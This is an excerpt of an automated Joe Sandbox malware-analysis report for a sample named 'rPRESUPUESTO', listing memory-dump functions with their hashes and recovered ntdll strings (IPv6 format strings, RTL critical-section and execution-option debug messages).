                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b1041bca71ab43b8cdd8d8f6bd7efbbc02f099b831d581280d9a65ccfaa7aa
                                                • Instruction ID: 411171b1bfe5d4da1b1c0a071c30b24d380450d55b0a0e4af0c99e13578fba22
                                                • Opcode Fuzzy Hash: 98b1041bca71ab43b8cdd8d8f6bd7efbbc02f099b831d581280d9a65ccfaa7aa
                                                • Instruction Fuzzy Hash: 7090023120141407D50171585509707004597D1301F55D411E5438558DDA568A956222
                                                Function 01812C60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09206e9d3c50193aa89872d9fd845d8c01d74c6890fe754deee46d71a02d0983
                                                • Instruction ID: cc5c01b4f6cf90035e6238997820de810f116caafbe2e921f317ff46cca7c76f
                                                • Opcode Fuzzy Hash: 09206e9d3c50193aa89872d9fd845d8c01d74c6890fe754deee46d71a02d0983
                                                • Instruction Fuzzy Hash: BF90023120141846D50171584405B46004597E1301F55C016E5138654DCA15CA957622
                                                Function 01812F90 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                                                • Instruction ID: 8beed3f05b6e7147c2b13ccb9e1baa906f22dc98a5b2b5a0f7ea9d5c96758365
                                                • Opcode Fuzzy Hash: b8a4d680c67ee9e4357e743eda9a3d191f39cbbf1faab40fdbc875ffa58da3d7
                                                • Instruction Fuzzy Hash: 3E90023120181406D5017158481570B004597D1302F55C011E6178555DCA258A956672
                                                Function 01812FA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                                                • Instruction ID: fdcdca2c39e05ca06bbf546ad167a1c05602ca3ecdbccd4c21556df75494c4b8
                                                • Opcode Fuzzy Hash: 647d8bd37a7c817aa7247e9c36bc2450dd6eb5ad0ab502c688614d51dadc4b98
                                                • Instruction Fuzzy Hash: 1B90023120181406D50171584809747004597D1302F55C011EA178555ECA65CAD56632
                                                Function 01812FB0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                                                • Instruction ID: 759e33711e3df367780cf9474ebbcf2b491d37e92b9842ac0eedf854ce6f1669
                                                • Opcode Fuzzy Hash: 176feaf1d25c62d662d97d0db6070e55bc279f2cb09aefbae1c28300770f112c
                                                • Instruction Fuzzy Hash: 24900221601410464541716888459064045BBE2311755C121E59AC550DC9598AA95766
                                                Function 01812FE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                                                • Instruction ID: 8614b132e70a6243bdc4cf5812171f364d3e988628d5cb6e27cbefc664eedbda
                                                • Opcode Fuzzy Hash: 1a1edaa1aeffab37fc1789eb442f384a1d1d208c07960e651d618cbabfdd27bb
                                                • Instruction Fuzzy Hash: A7900221211C1046D60175684C15B07004597D1303F55C115E5168554CCD158AA55622
                                                Function 01812F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2d17d35e1868b077667bcbed9f9308f7975c6b7e4de0f7e0d6eec18d54dff5c
                                                • Instruction ID: 5700324175ab69474d0c10da38491c1bcccd53e156d4b02f542af856cf161805
                                                • Opcode Fuzzy Hash: d2d17d35e1868b077667bcbed9f9308f7975c6b7e4de0f7e0d6eec18d54dff5c
                                                • Instruction Fuzzy Hash: 6990026134141446D50171584415B060045D7E2301F55C015E6078554DCA19CE966227
                                                Function 01812F60 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f453cf8ade48072803efe4366b2491584fa533fbb10d117123d620878b40b0a4
                                                • Instruction ID: 8ed9bf3dc91fd6663943fc9ebb2317b114dd5a3740c309ad2c0225faba20c56d
                                                • Opcode Fuzzy Hash: f453cf8ade48072803efe4366b2491584fa533fbb10d117123d620878b40b0a4
                                                • Instruction Fuzzy Hash: 2090026121141046D50571584405706008597E2301F55C012E7168554CC9298EA55226
                                                Function 01812E80 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 342b3d850a5e30f70603d95a8a84ffc1171f3688748fb2a752784120649bf29f
                                                • Instruction ID: 65222a017326953917af94158765b43a8fda1cf4ac512d8310845f4d0d3867bd
                                                • Opcode Fuzzy Hash: 342b3d850a5e30f70603d95a8a84ffc1171f3688748fb2a752784120649bf29f
                                                • Instruction Fuzzy Hash: 8A90022160141506D50271584405616004A97D1341F95C022E6038555ECE258BD6A232
                                                Function 01812EA0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc7f6e2a4e9320cb844035cd72347900077fb40d573ec0caf8406ebd44440bbc
                                                • Instruction ID: c51dc206bc289ea4f209eaffcade76dae3bcfbaa3498d411fd26e6855a7510de
                                                • Opcode Fuzzy Hash: fc7f6e2a4e9320cb844035cd72347900077fb40d573ec0caf8406ebd44440bbc
                                                • Instruction Fuzzy Hash: 7290027120141406D54171584405746004597D1301F55C011EA078554ECA598FD96766
                                                Function 01812EE0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 520e3601b6916d723b4b88de85a800269f1b5b1355be2ce3e526910babe72da2
                                                • Instruction ID: 64a515b884a7f9f0855c79b5b8dee351980096653504fdccf60eac43770b6814
                                                • Opcode Fuzzy Hash: 520e3601b6916d723b4b88de85a800269f1b5b1355be2ce3e526910babe72da2
                                                • Instruction Fuzzy Hash: 9D90026120181407D54175584805607004597D1302F55C011E7078555ECE298E956236
                                                Function 01812E30 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 569ee20a331bd790c95f7da12d605b8743e92b6a2c65cd409af253fdf0f16d76
                                                • Instruction ID: a6715fb30759c359b7a7db3f9414e2e272970355bf68ee7a7152dd542d324e89
                                                • Opcode Fuzzy Hash: 569ee20a331bd790c95f7da12d605b8743e92b6a2c65cd409af253fdf0f16d76
                                                • Instruction Fuzzy Hash: 9390022130141406D503715844156060049D7D2345F95C012E6438555DCA258B97A233
                                                Function 01813090 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 239705dd7af3ab68df78c6d2e5f28048c8b0fba86895afb148b51a2e76d55b05
                                                • Instruction ID: 0214d1af6c8680543e1a57658f4cc2728965256b61e7002fedb4628d04e8ff33
                                                • Opcode Fuzzy Hash: 239705dd7af3ab68df78c6d2e5f28048c8b0fba86895afb148b51a2e76d55b05
                                                • Instruction Fuzzy Hash: 0E90022124141806D541715884157070046D7D1701F55C011E5038554DCA168BA967B2
                                                Function 01813010 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af4fe0a41535251c33f00e8d30e960af0e854e8ddaa160ec43d369e0c35f5608
                                                • Instruction ID: ccb7e47dc973f41b644dd80a9666900fade5e321a3b27c7c78ed59092942c323
                                                • Opcode Fuzzy Hash: af4fe0a41535251c33f00e8d30e960af0e854e8ddaa160ec43d369e0c35f5608
                                                • Instruction Fuzzy Hash: B590022120185446D54172584805B0F414597E2302F95C019E916A554CCD158A995722
                                                Function 018139B0 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc182a37bb4a1e11e56f431408a46aa9f08cf1d24b0bff99b02e7f5ea6d2ba9b
                                                • Instruction ID: 0b2319c721bc8453001c9681bfea233ea5ac0b1a5370630f267a0a2d2343300e
                                                • Opcode Fuzzy Hash: fc182a37bb4a1e11e56f431408a46aa9f08cf1d24b0bff99b02e7f5ea6d2ba9b
                                                • Instruction Fuzzy Hash: D190022124546106D551715C44056164045B7E1301F55C021E5828594DC9558A996322
                                                Function 01813D10 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 364995cc996b41159ad0a24c2c641c627d62488233a7b6b1046cb17f4c14d9fe
                                                • Instruction ID: 007036170b5f4500f4a86b8abe93d303b387bb9975a1570fc028feaa823722a0
                                                • Opcode Fuzzy Hash: 364995cc996b41159ad0a24c2c641c627d62488233a7b6b1046cb17f4c14d9fe
                                                • Instruction Fuzzy Hash: 6190023120241146994172585805A4E414597E2302B95D415E5029554CCD148AA55322
                                                Function 01813D70 Relevance: .0, Instructions: 4COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abcb62053508fb1891e17316fe1755a6cd4881f1aabddc343597d772deab89ac
                                                • Instruction ID: 04ff5ff1d6101d814bfd865b75ab7482b988c68599376503f2cce817d712c1b0
                                                • Opcode Fuzzy Hash: abcb62053508fb1891e17316fe1755a6cd4881f1aabddc343597d772deab89ac
                                                • Instruction Fuzzy Hash: 9590023520141406D91171585805646008697D1301F55D411E5438558DCA548AE5A222
                                                Function 01812C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 5c50d62c8420c679e74bc3c3473ab3f4413ab18957b0b7cf1e19b8694fb772fd
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Function 01812890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                                                • Instruction ID: 96a30afb2279e16baf28d643eaa6eb0053075ceb8dddcc606288796155f83914
                                                • Opcode Fuzzy Hash: ee8b19aced4bd19a4ec72388f384d0a1d008057c1da42dba180687bf853e1568
                                                • Instruction Fuzzy Hash: 4A51F6B2A0011ABFDB11DBAC899097EFBBDBB483407608229F4A5D7645D734DF4087E0
                                                Function 01882410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                                                • Instruction ID: 4d51e301cf5f431a4085dedf14ff1180aa6c557132e50d539c6309c388d1a702
                                                • Opcode Fuzzy Hash: b70f5493bb1c3b3ca3542e0c5ba9a7ca817533433cd12a247ef44c8ed8d3d72e
                                                • Instruction Fuzzy Hash: C651F1B5A40646AACB30EE9CC99087FFBFAAF44300B44846DF496D3642E674EB40C770
                                                Function 01807630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01844655
                                                • ExecuteOptions, xrefs: 018446A0
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018446FC
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01844725
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01844742
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01844787
                                                • Execute=1, xrefs: 01844713
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                                                • Instruction ID: 74289f425b6418d8be41dac9285a9a8398f811a55d6a5c9898360217955806e2
                                                • Opcode Fuzzy Hash: ebb7944b7fcebc284e94316082138612a44034b48dccdcf29f6fd619895b59e3
                                                • Instruction Fuzzy Hash: 1D51197160021DAAEF62EAA8DC95BB977A8EF14344F1400A9E606E71C1EB70AB458F51
                                                Function 018A6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                • Instruction ID: 42a62f0f8c53f7d8bda98900ab731fc1f43c68f578abc89cb326012205b67b4d
                                                • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                • Instruction Fuzzy Hash: C2021871508342AFE305CF18C490A6BBBE5FFC4714F648A2DFA9587258EB71EA05CB52
                                                Function 0181B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 85cecca8b308c48b45c1cf395c914ab586026284699d9b2b98a79a262f643a8d
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: D081E372E052498FEF258F6CC8517FEBBB9AF54760F184919E851E7299C7308A40CB61
                                                Function 018820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                                                • Instruction ID: 33c38526ee9265dfe10424da57a061e01d01804813582f817285b848e3c50869
                                                • Opcode Fuzzy Hash: 7843487436741cc4d9c6c8fab32fccf7433ad8d76a73c0524ec3d1da09fb07ef
                                                • Instruction Fuzzy Hash: 182151BAA00519ABDB11EF7DC840AAEBBE9EF54744F54011AE905E3204E730EB11CBA1
                                                Function 017FF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018402E7
                                                • RTL: Re-Waiting, xrefs: 0184031E
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018402BD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                                                • Instruction ID: d0138a0c60c462586f2754cbd83f003971552e3aef632858dbfbc3af8f22222b
                                                • Opcode Fuzzy Hash: 24566e7d1c5dd4416ae393b8e9300915fd89bddd8e3822d23dbd8f909b9fee8f
                                                • Instruction Fuzzy Hash: 97E1AA326087459FD725CF28C884B6BBBE0AB88714F140A5DF6A5CB3E1DB74DA44CB52
                                                Function 0180BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Resource at %p, xrefs: 01847B8E
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01847B7F
                                                • RTL: Re-Waiting, xrefs: 01847BAC
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                                                • Instruction ID: f8eb3268073753a88c83e6c109dae21b6e48363a430e10f1477d2f4160b27a55
                                                • Opcode Fuzzy Hash: eaa6095cce8d35c821583fec88b052c6fde1faa14981f67a4d76a157eb4d6afa
                                                • Instruction Fuzzy Hash: B941263530170A8FD726DE29CC40B6AB7E5EF88710F100A1DFA56D7280DB31EA058B92
                                                Function 0180B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0184728C
                                                Strings
                                                • RTL: Resource at %p, xrefs: 018472A3
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01847294
                                                • RTL: Re-Waiting, xrefs: 018472C1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                                                • Instruction ID: 5ad9ec352261f7957b9e8bfe31103b7ddfaf6803214728911d6b02200fa8f19a
                                                • Opcode Fuzzy Hash: da1e8683500f4b8e552b25174d4699b8d0e9a6409287b4555120c5ca69d7bc80
                                                • Instruction Fuzzy Hash: 9041227570061AABC721CE29CC81B66B7A5FB94714F100619F956EB280DB31EA4287D2
                                                Function 01882300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                                                • Instruction ID: dd5b80cc0211d80568b7e559f871a180add6955aa70751cd6103ec3b9cca9cba
                                                • Opcode Fuzzy Hash: 56263039b4f1cef36665780a51a29875762760900755e0233688be340a777660
                                                • Instruction Fuzzy Hash: 4C317376A002199EDB20DE2DCC50BAEB7F9AF44710F84455AE949E3200EB30AB44CBA1
                                                Function 01817D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: e3732f5f58d65c20e8a1baa20bd1bc0f58955fbe311d0d13f036fcd12286329a
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: 2F91A173E0020A9AEB24DF6DC881ABFBBA9AF45720F64451EE955E72C8D7309B408751
                                                Function 017D9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                                                • Instruction ID: 8b0973c9e3fb7a8c421c9a124d811706ba930401231ee9ef54327a80ae95c6a6
                                                • Opcode Fuzzy Hash: c54bc7c70051c2b7fd6d4a6ca20a259aac4891217d319860771d2b4169ca7bf0
                                                • Instruction Fuzzy Hash: 90810C71D002699BDB31CB54CC45BEAB7B9AF48714F0441EAEA19B7280E7705F84DFA0

                                                Executed Functions

                                                Function 04C66C3A Relevance: 2.6, Strings: 2, Instructions: 58COMMON
                                                Download Yara Rule
